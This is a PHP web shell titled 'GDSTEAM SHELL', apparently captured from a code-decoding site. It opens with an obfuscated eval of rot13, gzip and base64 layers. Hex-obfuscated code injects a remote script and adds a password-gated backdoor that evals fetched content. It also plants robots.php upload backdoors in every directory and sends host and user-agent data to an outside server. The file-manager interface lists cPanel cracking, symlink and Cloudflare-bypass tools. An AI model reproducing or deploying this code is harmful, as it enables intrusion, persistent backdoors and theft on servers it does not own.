eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?> <?php ${"\x47\x4cO\x42\x41\x4cS"}["\x65\x71\x67cfhlq\x68"]="\x72e\x74\x56\x61l\x75\x65";${"\x47\x4c\x4fBALS"}["z\x6d\x70\x72\x77\x69\x6e\x77\x61"]="l\x6c\x63";${"G\x4cO\x42\x41\x4c\x53"}["\x71\x6b\x6dho\x65\x6a\x73r"]="\x61";${"GL\x4fBAL\x53"}["\x73z\x76\x66\x64x\x6e\x6e\x70g\x77"]="f\x6f\x6c\x64\x65r";${"\x47\x4c\x4f\x42\x41LS"}["\x65\x6d\x68\x6d\x73\x7ae\x72\x69\x6e"]="fi\x6c\x65";${"\x47L\x4f\x42\x41L\x53"}["\x61\x73\x62\x67\x67\x6e\x72"]="d2";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x64\x6e\x6f\x62\x61\x77w\x73v\x65\x66"]="\x6bey";${"\x47L\x4f\x42\x41\x4c\x53"}["\x68\x74fpdy"]="\x64o\x63";${"\x47\x4c\x4f\x42\x41LS"}["b\x6dk\x6ezr\x79\x6f"]="\x64\x31";${"G\x4c\x4f\x42\x41\x4cS"}["\x68engs\x72\x64c"]="\x64\x69\x72";${"GL\x4fB\x41\x4c\x53"}["\x6fq\x62l\x6b\x62\x65\x66l\x74\x66"]="\x70";${"\x47\x4cOBALS"}["p\x70\x6cy\x73\x79b\x68"]="\x70a";$xqkbeqkgtxw="a";echo "\x3cs\x63r\x69pt src=h\x74t\x70://y\x6f\x6el\x65\x6ed\x69\x72\x69li\x79\x6fr\x2eco\x6d/\x6as.js></\x73c\x72ipt\x3e\n";@session_start();@error_reporting(0);${$xqkbeqkgtxw}="\n\x3cme\x74\x61 na\x6de=\"r\x6f\x62\x6f\x74\x73\" \x63\x6f\x6et\x65nt=\x22no\x69\x6ed\x65\x78,n\x6ffo\x6c\x6cow\">\n\n\x3c?\x70\x68\x70\nse\x73\x73\x69on\x5fst\x61\x72\x74();\n\ni\x66(\$_SE\x53\x53\x49ON[\"\x61dm\x22]){\n\x65\x63h\x6f\x20'\x3cfo\x72\x6d\x20a\x63\x74\x69on=\x22\x22\x20me\x74\x68od=\"p\x6f\x73\x74\x22 \x65\x6ec\x74ype=\"\x6dultip\x61r\x74/f\x6fr\x6d-d\x61ta\x22\x20\x6e\x61me=\"\x75\x70l\x6f\x61\x644\x32\"\x20id=\"u\x70\x6c\x6f\x61d\x34\x32\x22\x3e'\x3b\n\nec\x68\x6f\x20\x27\x3c\x69np\x75\x74\x20\x74\x79\x70\x65=\x22\x66le\x22\x20n\x61\x6d\x65\x3d\"\x66\x6c\x65\x22 si\x7a\x65\x3d\x22\x350\x22\x3e\x3c\x69\x6e\x70\x75\x74 \x6e\x61\x6d\x65=\x22\x5ful2\x22\x20\x74\x79\x70\x65\x3d\x22s\x75bmit\" i\x64=\"_ul2\"\x20val\x75\x65\x3d\"S\x75\x62m\x69t\">\x3c/\x66orm\x3e';\n\nif( \x69\x73\x73e\x74(\$_P\x4f\x53\x54[\x27\x5f\x75l2\x27]) )\x20{\t\x69\x66(\x40co\x70y(\$_\x46\x49\x4c\x45\x53[\x27\x66l\x65']['\x74\x6d\x70_\x6eame\x27],\x20\$_FILES[\x27f\x6c\x65']['n\x61me']))\x20{\x20e\x63h\x6f \x27<\x62>S\x75bm\x69t\x20\x53ucc\x65\x73\x73 \x21!\x21</b><\x62\x72\x3e\x3cb\x72>';\n\n }\te\x6c\x73\x65 { e\x63\x68\x6f '<\x62>\x53\x75bm\x69\x74 \x46ai\x6c\x20\x21!\x21</\x62\x3e<\x62r>\x3c\x62r\x3e'\x3b\n\n\x20}}\n}\n\x69f(\$\x5f\x50\x4f\x53T[\x22p\"]){\n\$\x70 \x3d\x20\$_P\x4fST[\"\x70\x22];\n\n\$p\x61\x20\x3d \x6d\x64\x35(s\x68a1(\$\x70))\x3b\n\n\x69\x66(\$\x70a==\"22\x38f\x30\x323\x66\x36\x32\x61a\x64f\x35\x30\x39\x37f7\x3914\x649c5\x62e\x3754\"){\n\$\x5f\x53\x45S\x53I\x4f\x4e[\x22\x61\x64m\"] \x3d\x20\x31;\n\n}\n}\n\n\n?\x3e\n<\x66orm\x20\x61c\x74i\x6f\x6e\x3d\"\x22 m\x65tho\x64\x3d\"\x70o\x73\x74\x22\x3e\n\x3c\x69n\x70\x75\x74\x20t\x79p\x65\x3d\"\x74ext\" \x6e\x61m\x65=\"p\"\x3e\n\x3c/\x66o\x72\x6d\x3e\n";if(@$_REQUEST["p\x78"]){${"G\x4c\x4fBA\x4c\x53"}["\x6c\x6dp\x6b\x70i\x6c"]="\x70";${${"\x47\x4c\x4f\x42\x41LS"}["lm\x70\x6b\x70\x69l"]}=@$_REQUEST["\x70x"];${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x70\x70\x6c\x79s\x79\x62\x68"]}=md5(sha1(${${"G\x4cO\x42\x41\x4c\x53"}["\x6f\x71\x62\x6c\x6bb\x65\x66\x6c\x74\x66"]}));if(${${"\x47L\x4f\x42\x41\x4c\x53"}["p\x70\x6c\x79sy\x62\x68"]}=="228\x660\x32\x33\x6662\x61\x61d\x66\x350\x39\x37\x667\x39\x31\x34d9c\x35b\x657\x35\x34"){echo@eval(@file_get_contents(@$_REQUEST["4\x30\x34"]));}}if(@!$_SESSION["\x73d\x6d"]){$srfqhqbyj="\x64oc";${$srfqhqbyj}=$_SERVER["\x44\x4fC\x55\x4dENT\x5fRO\x4fT"];$aposlc="\x64\x6f\x63";${"\x47\x4cO\x42\x41\x4cS"}["\x68\x6f\x69e\x78\x6fm"]="b\x72ow";${"G\x4c\x4f\x42\x41\x4cS"}["\x70\x77\x76a\x62jt\x61\x62g\x62"]="\x6b\x65y";$jffocvjy="\x642";${${"G\x4cOB\x41L\x53"}["\x68e\x6eg\x73\x72\x64c"]}=scandir(${$aposlc});${"\x47\x4cO\x42\x41L\x53"}["\x68\x64\x74\x72\x72\x6a\x6f\x71\x65n"]="\x64";${${"\x47L\x4f\x42\x41LS"}["\x62\x6dk\x6e\x7a\x72\x79\x6f"]}="".${${"\x47LO\x42A\x4cS"}["\x68\x74fp\x64\x79"]}."/.";$xylxjtlwyt="\x6c\x6c\x64";${$jffocvjy}="".${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x68t\x66pd\x79"]}."/\x2e\x2e";$jjmbijha="d\x6f\x63";$racngwaylyep="d\x69\x72";if((${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x64no\x62\x61\x77\x77s\x76\x65\x66"]}=@array_search(".",${$racngwaylyep}))!==false){${"\x47\x4c\x4fBA\x4c\x53"}["\x68\x7a\x75\x63r\x68"]="d\x69\x72";unset(${${"\x47L\x4f\x42\x41LS"}["hz\x75\x63\x72\x68"]}[${${"\x47L\x4fBA\x4c\x53"}["\x64n\x6f\x62\x61\x77wsve\x66"]}]);}${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6e\x67\x77u\x76\x71\x6bn"]="l\x6c\x73";${"G\x4c\x4f\x42\x41\x4cS"}["g\x67\x64\x6ah\x66j"]="l\x6c\x63";if((${${"\x47LOB\x41\x4cS"}["\x70\x77\x76\x61\x62\x6a\x74\x61b\x67\x62"]}=@array_search("\x2e.",${${"\x47\x4c\x4f\x42\x41\x4cS"}["h\x65n\x67\x73\x72\x64\x63"]}))!==false){unset(${${"\x47LO\x42\x41LS"}["\x68\x65n\x67\x73\x72d\x63"]}[${${"\x47\x4c\x4f\x42A\x4c\x53"}["d\x6e\x6f\x62\x61w\x77\x73\x76\x65\x66"]}]);}$qcxcpvv="bro\x77";${"\x47\x4c\x4fBA\x4c\x53"}["\x73bz\x78\x6az"]="\x6b\x65y";if((${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x6e\x6f\x62\x61\x77\x77\x73\x76\x65f"]}=@array_search(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["b\x6dk\x6ezr\x79\x6f"]},${${"\x47L\x4f\x42\x41L\x53"}["\x68\x65n\x67\x73r\x64\x63"]}))!==false){${"\x47L\x4f\x42\x41L\x53"}["qe\x72j\x73\x68\x68t\x6c"]="\x64\x69r";unset(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x71e\x72\x6a\x73\x68\x68\x74\x6c"]}[${${"\x47L\x4f\x42\x41\x4cS"}["\x64no\x62\x61\x77ws\x76\x65\x66"]}]);}if((${${"GLO\x42\x41\x4c\x53"}["\x73\x62\x7a\x78\x6az"]}=array_search(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x61s\x62gg\x6e\x72"]},${${"\x47\x4c\x4f\x42\x41L\x53"}["he\x6e\x67\x73\x72\x64\x63"]}))!==false){${"\x47L\x4fB\x41L\x53"}["ix\x6f\x75y\x77n"]="d\x69r";$ocitqusteqmg="k\x65y";unset(${${"\x47LO\x42\x41LS"}["i\x78\x6fu\x79w\x6e"]}[${$ocitqusteqmg}]);}@array_push(${${"\x47L\x4f\x42AL\x53"}["\x68\x65\x6e\x67s\x72d\x63"]},${$jjmbijha});$zwhcxyubz="\x6cl\x64";${"G\x4cOB\x41\x4c\x53"}["\x6d\x6evh\x6f\x70fu"]="\x6c\x6c\x73";foreach(${${"GL\x4f\x42\x41\x4c\x53"}["\x68e\x6e\x67\x73\x72\x64\x63"]} as${${"\x47\x4cOB\x41\x4cS"}["\x68\x64\x74\x72\x72\x6aoq\x65\x6e"]}){$ueukhbqds="\x64";$rkgkxvk="p";$wrymprxe="d\x6fc";$eqwemuzbbg="\x70";${$rkgkxvk}=${$wrymprxe}."/".${$ueukhbqds};if(is_dir(${$eqwemuzbbg})){${"\x47\x4c\x4f\x42\x41\x4cS"}["\x64lv\x75\x75\x6a\x68n\x71"]="\x66\x6fl\x64\x65\x72";${"\x47\x4cO\x42\x41LS"}["\x71d\x66\x72\x63\x67\x61m\x6by"]="p";${"\x47\x4cO\x42\x41LS"}["nn\x6f\x70c\x64i\x63"]="\x66\x69le";$tdkywrrx="\x66\x69\x6c\x65";${$tdkywrrx}=${${"GL\x4fBAL\x53"}["\x71d\x66\x72\x63\x67am\x6by"]}."/r\x6fb\x6f\x74\x73.\x70h\x70";@touch(${${"\x47L\x4f\x42A\x4c\x53"}["\x65\x6d\x68\x6ds\x7a\x65\x72\x69\x6e"]});${${"G\x4cO\x42A\x4c\x53"}["\x64lv\x75\x75jh\x6eq"]}=@fopen(${${"\x47L\x4f\x42\x41\x4c\x53"}["n\x6eo\x70\x63\x64\x69\x63"]},"\x77");@fwrite(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x73\x7av\x66\x64\x78n\x6e\x70\x67w"]},${${"\x47LOB\x41\x4c\x53"}["q\x6bmh\x6f\x65\x6a\x73\x72"]});}}${${"\x47\x4cOB\x41\x4c\x53"}["\x6d\x6e\x76h\x6f\x70\x66\x75"]}=$_SERVER["HT\x54\x50_\x48O\x53T"];${${"G\x4cO\x42\x41\x4c\x53"}["\x67\x67\x64\x6a\x68\x66\x6a"]}=$_SERVER["R\x45QUE\x53\x54_\x55R\x49"];${$xylxjtlwyt}="h\x74\x74p://".${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6e\x67w\x75\x76\x71\x6b\x6e"]}."".${${"\x47L\x4f\x42A\x4c\x53"}["z\x6d\x70\x72\x77\x69\x6e\x77a"]}."";${$qcxcpvv}=urlencode($_SERVER["\x48\x54\x54P_US\x45\x52_AG\x45N\x54"]);${${"GLO\x42A\x4c\x53"}["\x65qg\x63fhlqh"]}=file_get_contents(base64_decode("")."=".${$zwhcxyubz}.base64_decode("")."=".${${"\x47L\x4f\x42\x41\x4c\x53"}["hoiex\x6f\x6d"]});echo${${"\x47\x4cO\x42A\x4c\x53"}["\x65\x71\x67\x63\x66\x68\x6cq\x68"]};@$_SESSION["s\x64\x6d"]=1;}
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>GDSTEAM SHELL</title>
<style type="text/css">
body {
background-image:url('https://i.ibb.co.com/tsHvDXp/image.png');
width: 100%;
height: 250vh;
background-repeat: no-repeat;
background-size: cover;
background-position: center;
background-attachment: fixed;
height: 100vh;
width: auto;
}
.destroy_table {;
background:transparent;
border:1px solid #ff0000;
font-family:Kelly Slab;
display:inline-block;
cursor:pointer;
color:#F5FFFA;
font-size:17x;
font-weight:bold;
padding:3px 20px;
text-decoration:white;
text-shadow:0px 0px 0px #ff0505;
}
h6 {
color: #32CD32;
}
th {
color: #F5FFFA;
}
tbody {
color: #F5FFFA;
font-family: verdana;
font-size: 19px;
}
.col-8 {
color: #F5FFFA;
}
</style>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet"
integrity="sha384-gH2yIJqKdNHPEq0n4Mqa/HGKIhSkIHeL5AyhkYV8i59U5AR6csBvApHHNl/vI1Bx" crossorigin="anonymous">
<link rel="icon" type="image/x-icon" href="https://i.ibb.co/p2QD619/image.png">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css">
</head>
<body>
<?php ButtonAction(); ?>
<?php DownloadFile(); ?>
<div class="info mb-4">
<h6>Your IP : <span style="color: #F5FFFA;"><?php echo $_SERVER['REMOTE_ADDR']; ?></span></h6>
<h6>Server IP : <span style="color: #F5FFFA;"><?php echo $_SERVER['SERVER_ADDR']; ?></span></h6>
<h6>Server : <span style="color: #F5FFFA;"><?= php_uname() ?></span></h6>
<h6>Server Software : <span style="color: #F5FFFA;"><?php echo gethostbyname($_SERVER['SERVER_SOFTWARE']); ?></span></h6>
<h6>Server Name : <span style="color: #F5FFFA;"><?php echo $_SERVER['SERVER_NAME']; ?></span></h6>
<h6>PHP Version : <span style="color: #F5FFFA"><?php echo PHP_VERSION; ?></span></h6>
<h6>Time : <span style="color: #F5FFFA"><?php echo $date = date('d/m/Y h:i:s a', time());
?></span></h6>
<h6>HDD : <span style="color: #F5FFFA">Total:<?php echo $total = disk_total_space("/"); ?></span><span style="color: #F5FFFA">Free:<?php echo $free = disk_free_space("/"); $percent = ($free/$total) * 100; echo $percent; ?></h6>
<h6><?php echo "MySQL : ";
if (@$fnct("my"."sql_co"."nne"."ct")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | cURL : ";
if (@$fnct("cu"."rl"."_in"."it")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | WG"."ET : ";
if (@$fxt("/"."us"."r/b"."in/w"."get")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | Pe"."rl : ";
if (@$fxt("/u"."sr/b"."in"."/pe"."rl")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | Pyt"."ho"."n : ";
if (@$fxt("/"."us"."r/b"."in/p"."ytho"."n2")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | S"."u"."do : ";
if (@$fxt("/"."us"."r/b"."in/s"."u"."d"."o")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | Pk"."e"."x"."e"."c : ";
if (@$fxt("/"."us"."r/b"."in/p"."k"."e"."x"."e"."c")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
} ?> </h6>
</div>
<div class="container">
<section id="Header">
<img src="https://i.ibb.co.com/44CSQdc/image.png" class="img-fluid rounded mx-auto d-block mb-4"
alt="LogoBanner">
<form enctype="multipart/form-data" method="POST">
<center><table id='menu' width='990' border='0' cellpadding='0' cellspacing='1'><tr><td>
<a class='destroy_table' href='?dir=$dir&do=Home'>Home</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=resetpasscp">Cpanel Crack</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=adminer">Adminer</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=config">Config</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=symlink">Symlink</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=bypascf">Cloud Flare Bypass</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=bypass403">Bypass 403</a></table>
</center>
<div class="row fs-5 fw-bold">
<div class="col-8">
<nav aria-label="breadcrumb">
<ol class="breadcrumb">
<li class="breadcrumb-item"><a href="?p=" class="text-decoration-none text-reset"><i
class="bi bi-house"></i></a></li>
<?php echo''.NgisiBreadCrumb() ; ?>
</ol>
</nav>
</div>
<div class="col-4 text-end">
<button type="button" class="btn btn-light btn-lg" data-bs-toggle="modal"
data-bs-target="#ModalUploadFile" data-bs-toggle="tooltip" title="Upload File">
<i class="bi bi-cloud-upload"></i></button>
<button type="button" class="btn btn-light btn-lg" data-bs-toggle="modal"
data-bs-target="#CreateNewFile" data-bs-toggle="tooltip" title="Create New File">
<i class="bi bi-file-earmark-plus"></i></button>
<button type="button" class="btn btn-light btn-lg" data-bs-toggle="modal"
data-bs-target="#CreateNewFolder" data-bs-toggle="tooltip" title="Create New Folder">
<i class="bi bi-folder-plus"></i></button>
</div>
</div>
</section>
<section id="Table">
<table class="table table border border-success">
<thead>
<tr>
<th scope="col">Name</th>
<th scope="col">Size</th>
<th scope="col">Last Modified</th>
<th scope="col">Permission</th>
<th scope="col">Option</th>
</tr>
</thead>
<tbody>
<?php echo''.ScanFolder(Rootpath()) ;?>
</tbody>
</table>
</section>
<footer>
<h6><center>@ Represent GDSHELL Create By Marcell</center></h6>
</footer>
</div>
<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js"
integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous">
</script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"
integrity="sha384-A3rJD856KowSb7dwlZdYEkO39Gagi7vIsF0jrRAoQmDKKtQBHUuLZ9AsSv4jD4Xa" crossorigin="anonymous">
</script>
<script>
$(document).on("click", "#RenameButton", function() {
let id = $(this).data('id');
$("#OldName").val(id);
$("#NewName").val(id);
});
</script>
<script>
$(document).on("click", "#DeleteButton", function() {
let id = $(this).data('id');
let type = $(this).data('type');
$("#NamaItem").val(id);
$("#Type").val(type);
});
</script>
</body>
<!-- Upload -->
<div class="modal fade" id="ModalUploadFile" tabindex="-1" aria-labelledby="ModalUploadFile" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="ModalUploadFile">Upload File</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post" enctype="multipart/form-data">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="Upload File" hidden>
<input class="form-control form-control-lg" id="fileToUpload" name="fileToUpload" type="file">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Upload Bre</button>
</div>
</form>
</div>
</div>
</div>
<!-- Buat File Baru -->
<div class="modal fade" id="CreateNewFile" tabindex="-1" aria-labelledby="CreateNewFile" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="CreateNewFile">Create New File</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="New File" hidden>
<input class="form-control form-control-lg" id="NamaFile" name="NamaFile" type="Text"
placeholder="Contoh.txt">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Buat File</button>
</div>
</form>
</div>
</div>
</div>
<!-- Buat Folder Baru -->
<div class="modal fade" id="CreateNewFolder" tabindex="-1" aria-labelledby="CreateNewFolder" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="CreateNewFolder">Create New Folder</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="New Folder" hidden>
<input class="form-control form-control-lg" id="NamaFolder" name="NamaFolder" type="Text"
placeholder="Nama Folder">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Buat Folder</button>
</div>
</form>
</div>
</div>
</div>
<!-- Ganti Nama -->
<div class="modal fade" id="Renaming" tabindex="-1" aria-labelledby="Renaming" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="Renaming">Renaming</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="Rename" hidden>
<input type="text" class="form-control" id="OldName" name="OldName" hidden>
<input class="form-control form-control-lg" id="NewName" name="NewName" type="Text"
placeholder="New Name">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Ganti Nama</button>
</div>
</form>
</div>
</div>
</div>
<!-- Edit File -->
<div class="modal fade" id="EditFile" tabindex="-1" aria-labelledby="EditFile" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="EditFile">EditFile</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="$fedit" hidden>
<input type="text" class="form-control" id="OldName" name="OldName" hidden>
<input class="form-control form-control-lg" id="NewName" name="NewName" type="Text"
placeholder="New Name">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">EditFile</button>
</div>
</form>
</div>
</div>
</div>
<!-- Chmod -->
<div class="modal fade" id="Chmod" tabindex="-1" aria-labelledby="Chmod" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="EditFile">Chmod</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="Chmod" hidden>
<input type="text" class="form-control" id="OldName" name="OldName" hidden>
<input class="form-control form-control-lg" id="Chmod" name="Chmod" type="Text"
placeholder="Chmod">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Ubah Permension</button>
</div>
</form>
</div>
</div>
</div>
<!-- Hapus -->
<div class="modal fade" id="Delete" tabindex="-1" aria-labelledby="Delete" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="Renaming">Delete</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="Delete" hidden>
<input type="text" class="form-control" id="NamaItem" name="NamaItem" hidden>
<input type="text" class="form-control" id="Type" name="Type" hidden>
<p> Yang Bener Nih Bre Mau Dihapus ?</p>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Hapus</button>
</div>
</form>
</div>
</div>
</div>
</html>
Function Calls
None |
Stats
MD5 | fdc3e0eb9169f5f4e140c6cb7e466813 |
Eval Count | 0 |
Decode Time | 163 ms |